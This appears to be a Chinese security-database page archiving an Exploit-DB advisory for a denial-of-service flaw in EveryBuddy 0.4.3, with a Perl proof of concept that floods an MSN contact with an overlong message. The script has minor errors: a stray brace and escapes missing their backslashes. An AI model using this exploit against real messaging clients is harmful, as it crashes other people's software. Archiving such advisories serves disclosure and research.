EveryBuddy 0.4.3 – Long Message Denial of Service

EveryBuddy 0.4.3 – Long Message Denial of Service

漏洞ID 1054075 漏洞类型
发布时间 2003-08-05 更新时间 2003-08-05
图片[1]-EveryBuddy 0.4.3 – Long Message Denial of Service-安全小百科CVE编号 N/A
图片[2]-EveryBuddy 0.4.3 – Long Message Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22987
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8343/info

EveryBuddy is prone to a denial of service vulnerability when handling instant messages of excessive length. This could be exploited with a malicious instant messaging client.

This condition may be due to a buffer overflow, though this has not been confirmed.

#!/usr/bin/perl

use MSN; # from  <http://www.adamswann.com/library/2002/msn-perl/> 
http://www.adamswann.com/library/2002/msn-perl/

my $client = MSN->new();
$client->connect('email address', 'password', '', {
    Status => &Status,
    Answer => &Answer,
    Message => &Message,
    Join => &Join }
);


sub Status {
   my ($self, $username, $newstatus) = @_;

   print "Status() called with parameters:n";
   print " " . join(",", @_), "n";

   # Print the status change info.
   print "${username}'s status changed from " . 
$self->buddystatus($username) . " to $newstatus.n";

      # Initiate the call.
      $self->call($username);

      # The call may take a few seconds to complete, so we can't
      # immediately send messages. Let's put the message in a
      # FIFO (queue) that is keyed by username.
      push (@{$queue{$username}}, "Glad to see you online!");
   }

}

sub Message {
   my ($self, $username, undef, $msg) = @_;

   print "Message() called with parameters:n";
   print " " . join(",", @_), "n";

}

sub Join {
   my ($self, $username) = @_;

   print "Join() called with parameters:n";
   print " " . join(",", @_), "n";

   # See if there's anything queued up.
   # Deliver each message if there is stuff in the queue for this user.
   while ($_ = shift @{$queue{$username}}) {
      $$self->sendmsg($_);
   }
}

sub Answer {
   my ($self, $username) = @_;

   print "Answer() called with parameters:n";
   print " " . join(",", @_), "n";

   # Send a hello message.
   $$self->sendmsg("AAAAAAAAAAAAAAAAAAAAAAAAAAAr"x55);

}

相关推荐: Microsoft NetMeeting读取另一个客户端的剪贴板中的内容漏洞

Microsoft NetMeeting读取另一个客户端的剪贴板中的内容漏洞 漏洞ID 1207051 漏洞类型 未知 发布时间 1999-05-04 更新时间 1999-05-04 CVE编号 CVE-1999-1097 CNNVD-ID CNNVD-199…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享